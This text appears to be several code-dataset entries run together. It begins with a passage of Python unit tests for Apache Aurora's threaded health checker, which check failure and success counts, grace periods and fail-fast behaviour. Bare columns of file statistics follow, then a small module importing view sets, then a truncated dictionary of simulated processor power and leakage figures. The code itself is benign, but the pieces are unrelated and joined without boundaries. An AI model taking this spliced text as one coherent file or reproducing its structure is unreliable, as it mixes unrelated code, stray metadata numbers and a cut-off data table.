hc._maybe_update_health_check_count(False, 'reason-3')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-4')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_dont_ignore_failures_after_grace_period(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_fail_fast(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-3')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-4')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
assert hc.running is False
assert hc.healthy is False
assert hc.reason == 'reason-4'
def test_maybe_update_health_check_count_max_failures_1(self):
hc = self.health_checker.threaded_health_checker
hc.current_consecutive_successes = 1
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
assert hc.healthy is False
assert hc.reason == 'reason-2'
def test_maybe_update_health_check_count_success(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.running is False
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 2
assert hc.running is True
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 3
assert hc.running is True
assert hc.healthy is True
def test_run_success(self):
self.health.return_value = (True, 'success')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert self.clock.sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 3
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is True
assert self.health_checker.threaded_health_checker.reason is None
def test_run_failure(self):
self.health.return_value = (False, 'failure')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert self.clock.sleep.call_count == 4
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure'
def test_run_failure_unhealthy_when_failfast(self):
health_status = [(False, 'failure-1'), (True, None), (False, 'failure-3'), (False, 'failure-4')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert self.clock.sleep.call_count == 4
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-4'
def test_run_unhealthy_after_callback(self):
health_status = [(True, None), (True, None), (False, 'failure-4'), (False, 'failure-5')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert self.clock.sleep.call_count == 4
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-5'
@mock.patch('apache.aurora.executor.common.health_checker.ExceptionalThread.start',
spec=ExceptionalThread.start)
def test_start(self, mock_start):
assert mock_start.call_count == 0
self.health_checker.threaded_health_checker.start()
mock_start.assert_called_once_with(self.health_checker.threaded_health_checker)
def test_stop(self):
assert not self.health_checker.threaded_health_checker.dead.is_set()
self.health_checker.threaded_health_checker.stop()
assert self.health_checker.threaded_health_checker.dead.is_set()
class TestThreadedHealthCheckerWithDefaults(unittest.TestCase):
'''
Similar tests as above but with the default health check configuration. This
will ensure that the defaults are always valid.
'''
def setUp(self):
self.health = mock.Mock()
self.health.return_value = (True, 'Fake')
self.sandbox = mock.Mock(spec_set=SandboxInterface)
self.sandbox.exists.return_value = True
self.sandbox.root = '/root'
self.health_checker = HealthCheckerProvider().from_assigned_task(
AssignedTask(
task=TaskConfig(
executorConfig=ExecutorConfig(
name='thermos',
data=MESOS_JOB(task=HELLO_WORLD).json_dumps())),
instanceId=1,
assignedPorts={'health': 9001}),
self.sandbox)
self.health_checker.threaded_health_checker.checker = self.health
def test_perform_check_if_not_disabled_snooze_file_is_none(self):
self.health_checker.threaded_health_checker.snooze_file = None
assert self.health.call_count == 0
assert self.health_checker.metrics.sample()['snoozed'] == 0
self.health_checker.threaded_health_checker._perform_check_if_not_disabled()
assert self.health.call_count == 1
assert self.health_checker.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_no_snooze_file(self, mock_os_path):
mock_os_path.isfile.return_value = False
assert self.health.call_count == 0
assert self.health_checker.metrics.sample()['snoozed'] == 0
self.health_checker.threaded_health_checker._perform_check_if_not_disabled()
assert self.health.call_count == 1
assert self.health_checker.metrics.sample()['snoozed'] == 0
@mock.patch('os.path', spec_set=os.path)
def test_perform_check_if_not_disabled_snooze_file_exists(self, mock_os_path):
mock_os_path.isfile.return_value = True
assert self.health.call_count == 0
assert self.health_checker.metrics.sample()['snoozed'] == 0
result = (
self.health_checker.threaded_health_checker._perform_check_if_not_disabled())
assert self.health.call_count == 0
assert self.health_checker.metrics.sample()['snoozed'] == 1
assert result == (True, None)
def test_maybe_update_health_check_count_reset_count(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason-3')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
def test_maybe_update_health_check_count_ignore_failures_inside_grace_period(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_dont_ignore_failures_after_grace_period(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 2
assert hc.current_consecutive_successes == 0
def test_maybe_update_health_check_count_fail_fast(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-2')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-3')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.running is False
assert hc.healthy is False
assert hc.reason == 'reason-3'
def test_maybe_update_health_check_count_max_failures(self):
hc = self.health_checker.threaded_health_checker
hc.attempts = hc.forgiving_attempts
hc.current_consecutive_successes = 1
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.healthy is True
hc.attempts += 1
hc._maybe_update_health_check_count(False, 'reason-1')
assert hc.current_consecutive_failures == 1
assert hc.current_consecutive_successes == 0
assert hc.healthy is False
assert hc.reason == 'reason-1'
def test_maybe_update_health_check_count_success(self):
hc = self.health_checker.threaded_health_checker
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 0
assert hc.healthy is True
assert hc.running is False
hc.attempts += 1
hc._maybe_update_health_check_count(True, 'reason')
assert hc.current_consecutive_failures == 0
assert hc.current_consecutive_successes == 1
assert hc.running is True
assert hc.healthy is True
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_success(self, mock_sleep):
mock_sleep.return_value = None
self.health.return_value = (True, 'success')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 3
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is True
assert self.health_checker.threaded_health_checker.reason is None
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_failure(self, mock_sleep):
mock_sleep.return_value = None
self.health.return_value = (False, 'failure')
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_first_success_after_grace_period_and_max_consecutive_failures(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(False, 'failure-1'), (False, 'failure-2'), (True, None)]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 1
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is True
assert self.health_checker.threaded_health_checker.reason is None
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_success_then_failures_ignored_till_grace_period_ends(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(True, None), (False, 'failure-2'), (False, 'failure-3')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-3'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_failure_unhealthy_when_failfast(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(False, 'failure-1'), (False, 'failure-2'), (False, 'failure-3')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 3
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 1
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is False
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-3'
@mock.patch('apache.aurora.executor.common.health_checker.time.sleep', spec=time.sleep)
def test_run_unhealthy_after_callback(self, mock_sleep):
mock_sleep.return_value = None
health_status = [(True, None), (True, None), (False, 'failure-4'), (False, 'failure-5')]
self.health.side_effect = lambda: health_status.pop(0)
mock_is_set = mock.Mock(spec=threading._Event.is_set)
liveness = [False, False, False, False, True]
mock_is_set.side_effect = lambda: liveness.pop(0)
self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
self.health_checker.threaded_health_checker.run()
assert mock_sleep.call_count == 4
assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
assert self.health_checker.threaded_health_checker.running is True
assert self.health_checker.threaded_health_checker.healthy is False
assert self.health_checker.threaded_health_checker.reason == 'failure-5'
@mock.patch('apache.aurora.executor.common.health_checker.ExceptionalThread.start',
spec=ExceptionalThread.start)
def test_start(self, mock_start):
assert mock_start.call_count == 0
self.health_checker.threaded_health_checker.start()
mock_start.assert_called_once_with(self.health_checker.threaded_health_checker)
def test_stop(self):
assert not self.health_checker.threaded_health_checker.dead.is_set()
self.health_checker.threaded_health_checker.stop()
assert self.health_checker.threaded_health_checker.dead.is_set()
| 44.735651
| 100
| 0.740377
| 7,066
| 55,338
| 5.469714
| 0.048118
| 0.114699
| 0.105954
| 0.071257
| 0.896427
| 0.885637
| 0.872442
| 0.866517
| 0.856892
| 0.850294
| 0
| 0.009657
| 0.17104
| 55,338
| 1,236
| 101
| 44.771845
| 0.832865
| 0.035961
| 0
| 0.813931
| 0
| 0
| 0.052975
| 0.011463
| 0
| 0
| 0
| 0
| 0.354962
| 1
| 0.054389
| false
| 0
| 0.016221
| 0.001908
| 0.078244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3b91ae918fb0454637e17919bfa1a1817eb078b
| 197
|
py
|
Python
|
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | 3
|
2021-09-21T21:00:51.000Z
|
2022-03-24T19:36:39.000Z
|
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | null | null | null |
backend/core/views/__init__.py
|
linea-it/pz-server
|
20b75baae8afd2d3e5ede6fbcd71ebe54918a7cd
|
[
"MIT"
] | null | null | null |
from core.views.release import ReleaseViewSet
from core.views.product_type import ProductTypeViewSet
from core.views.product import ProductViewSet
from core.views.github_auth import TestGithubAuth
| 39.4
| 54
| 0.878173
| 26
| 197
| 6.576923
| 0.5
| 0.187135
| 0.304094
| 0.233918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081218
| 197
| 4
| 55
| 49.25
| 0.944751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43019fa53da9679d3c3989c61f8a90ca850bf8f8
| 68,676
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_mylocality/cmp_GemsFDTD/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0648189,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.2536,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.381762,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189343,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.327873,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.188044,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.70526,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.128628,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.77849,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0721231,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00686382,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0726115,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0507621,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.144735,
'Execution Unit/Register Files/Runtime Dynamic': 0.0576259,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.193217,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.542007,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 1.96387,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000127827,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000127827,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000110579,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 4.23925e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000729202,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00109543,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00125267,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0487989,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.10403,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.117802,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.165743,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
